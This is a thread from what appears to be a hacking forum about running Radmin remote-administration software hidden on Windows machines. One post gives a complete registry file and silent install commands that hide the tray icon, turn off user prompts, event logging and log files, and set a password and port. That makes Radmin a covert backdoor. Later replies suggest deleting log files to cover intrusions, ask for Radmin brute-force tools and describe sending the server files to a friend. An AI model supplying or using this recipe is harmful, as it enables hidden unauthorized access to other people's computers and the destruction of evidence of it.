hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Radmin
Doc
Hallo,
I've got a question about Radmin.
Could I start it in the background from the command.
Because my problem is....when I start Radmin in the taskbar is the symbol.

Doc
Andy
yes..if u run the option, and the click options check Hide tray icon

or just put DisableTrayIcon with value 1 in the registry in HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
SkullSplitter
hi


upload your radmin files

create an reg-file .. and insert this ...

CODE

REGEDIT4

[HKEY_CURRENT_USER\Software\RAdmin]

[HKEY_CURRENT_USER\Software\RAdmin\v2.0]

[HKEY_CURRENT_USER\Software\RAdmin\v2.0\Clients]
"2"=hex:e0,93,04,00,0c,0c,00,50,00,00,05,00,00,00,64,00,00,00,00,00,00,00,01,\
& nbsp;00,00,00,00,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,01,00,
\
& nbsp;00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,31,39,32,
\
& nbsp;2e,31,36,38,2e,31,2e,35,30,00,00,00,00,51,05,01,35,1c,ca,12,00,2e,00,d3,77,
\
& nbsp;51,05,01,35,6b,00,10,01,af,cc,d3,77,50,ef,5e,00,07,00,00,00,11,00,00,00,04,
\
& nbsp;00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,f8,d3,14,00,00,02,
\
& nbsp;00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,31,39,32,
\
& nbsp;2e,31,36,38,2e,31,2e,35,30,00,00,00,00,51,05,01,35,1c,ca,12,00,2e,00,d3,77,
\
& nbsp;51,05,01,35,6b,00,10,01,af,cc,d3,77,50,ef,5e,00,07,00,00,00,11,00,00,00,04,
\
& nbsp;00,00,00,28,00,00,00,10,00,00,00,02,02,00,00,00,00,00,00,f8,d3,14,00,00,02,
\
& nbsp;00,00,03,00,00,00,03,00,00,00,48,00,00,00,14,00,00,00,11,00,00,00,00,00,00,
\
 00,00,00,00,00,00,00,23,13,00,00,49,9c,00,00,02,00,00,00,00,00,00,00

[HKEY_CURRENT_USER\Software\RAdmin\v2.0\Parameters]
"showbw"=hex:01,00,00,00
"ViewType"=hex:00,00,00,00
"ConnectionMode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin]

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01]

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:b8,9d,90,49,c1,fa,95,ab,24,d7,22,bf,bb,f6,01,39,12,6a,cd,f9,b9,2a,\
& nbsp;13,33,77,16,0b,60,1e,04,92,ad,c9,66,ee,91,06,59,b8,6e,5f,af,4c,a1,e6,30,2b,
\
 2e,3a,66,b9,c6,16,83,d8,84,58,bc,88,bc,7b,9d,4a,c2

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:a8,ec,df,a9,a5,35,f5,b0,b8,48,19,06,0f,4a,07,49
"Port"=hex:f7,7a,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001


and execute the following commands:

regedit /s c:\winnt\system32\radmin.reg
c:\winnt\system32\radmin.exe /install /silence
c:\winnt\system32\radmin.exe /pass:##YOUR_PW## /port:##YOUr_PORT## /save /silence
c:\winnt\system32\radmin.exe /start /silence

Now its hidden ... your port ... and your pass

enjoy it

SkullSplitter

billy1816
There is a statement in the reg key about logfile, are you sure you want it to log a file in c?
Andy
the easiest way to go about this is to run the setup on your own computer, make the settings to your liking, and then export the changes in the registry into a .reg file and then just run that on a remote computer.
arun0075
hey SkullSplitter it's a nice information thanks man smile.gif i didn't knew it before but thanks to u
biboupoki
tahnx for the reg
Bl00r
Ghost can open any GUI program hidden
arun0075
hmm.. try using hidden32 proggy smile.gif
KoNh
Boy oh my boy ^^ lol a complete radmin set even with clients params nice ^^

well watcha need is th followig key

--- Regfile Begin ------------------------

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00


--- Regfile End --------------------------

This is the only one key needed to hide the icon,
hidden32.exe or else will not do shît ^^ ...

every other lines are yer proper settings, logfile etc mine looks like:




--- Regfile Begin ------------------------

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:This-is _ the_password_place
"Port"=hex:This_is_the_port_place
"Timeout"=hex:Your_time_out_setting
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="z:\\"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

--- Regfile End --------------------------

Doc
Thanks a lot for that information
SkullSplitter
QUOTE (billy1816 @ Dec 3 2003, 05:39 AM)
There is a statement in the reg key about logfile, are you sure you want it to log a file in c?

yes sure

in the program i disabled the log tongue.gif

SkullSplitter
net
i was using a similar batchfile / regfile, but this is a perfect one biggrin.gif

thanx
SLiM577
yes try ghost or that hidden32 kit
SkitZZ
hidden32.exe only hides the programs GUI doesn't hide the icon in the tasktray.

that reg file should do it


SkitZZ
jacerra
Hidden32.exe should be able to hide it without a problem, but if you use Norton Ghost it will catch it like butters!
~jimmy
saiko13
very nice and usefull... THX alot... learning every day! biggrin.gif
ellitio
thanks SkullSplitter for the info...
verba
great dude thanks for this info very appriciate biggrin.gif
101

Then in what all those radmin, servu, radminbf (too lol) things are security talks ?

/me hope all threads laming relating will become close for good by a decent moderator.

thats too bad for your board name GSO :/



KoNh
QUOTE (jacerra @ Dec 17 2003, 09:31 PM)
Hidden32.exe should be able to hide it without a problem, but if you use Norton Ghost it will catch it like butters!
~jimmy

Hooly sh*t !!! where have you been last 3 years how can you say dumb
things like this, u didn't even tryed it, it also has been said before in the thread !!!

Norton Ghost catch virii now, that's a pretty new feature ain't it ??

Gee where this board is going ?!
Zivleton
There's a very good hiding program called HideWindow (By Adrian Lopez), It's a very usefull tool... u should try it.

-Zivlet-
Zivleton
Oh, and there's another good program called HideWin.exe.
You can make hot keys for hiding specific programs... also very good program.
Enjoy tongue.gif

-Zivlet-
KoNh
QUOTE (Zivleton @ Dec 19 2003, 11:18 AM)
Oh, and there's another good program called HideWin.exe.
You can make hot keys for hiding specific programs... also very good program.
Enjoy  tongue.gif

-Zivlet-

u are as dum as all peolple speaking about hidding window
and else, u don't even read the all thread before replying,
are you just trying to get more post count ?, gee !! i'd ban people like you...

no interest... ok ok I quit just loosing my time here...
flame
dont be harsh
this happens often when the server times out and they get an error - but still the post had been posted .
dont blame me cuzz im beautifull smile.gif
northernsky
You do know that if you're setting up your own server, you can disable logging, etc. while setting up the server. Then also, if you're hacking other boxes, (which is illegal and bad) then they probably left an easy password, so they probably aren't the brightest apple in the orchard, then even if they are logging, it's probably C:/logfile.txt

Just delete/edit that and you'll probably be covered.
skorpio
Where can i find more information about radmin?

This is more interesting ^^

thx bye
zero-maitimax
nice we are taliking about radmin.

/offtopic

does anybody has a brute fore program for radmin?

//offtopic
Yosam
why radmin is not working on a remote machine?

i sent my friends these files:
r_server.exe
Admdll.dll
raddrv.dll

he ran the r_server.exe file and the program is running in the background
but i still can't connect to him..

some people told me it's not working on XP machines? is it right?

thanks.
beenal
QUOTE (Yosam @ Dec 29 2003, 06:06 PM)
some people told me it's not working on XP machines? is it right?

It works with all windows versions above win95!

maybe theres a problem with the Xp-internal Firewall?


btw: would be interested in radmin-bruteforcing too cool.gif
Jackson
nice reg file great work thx laugh.gif
Yosam
I meant it's not working remotely..

locally it works great..

any ideas? sad.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.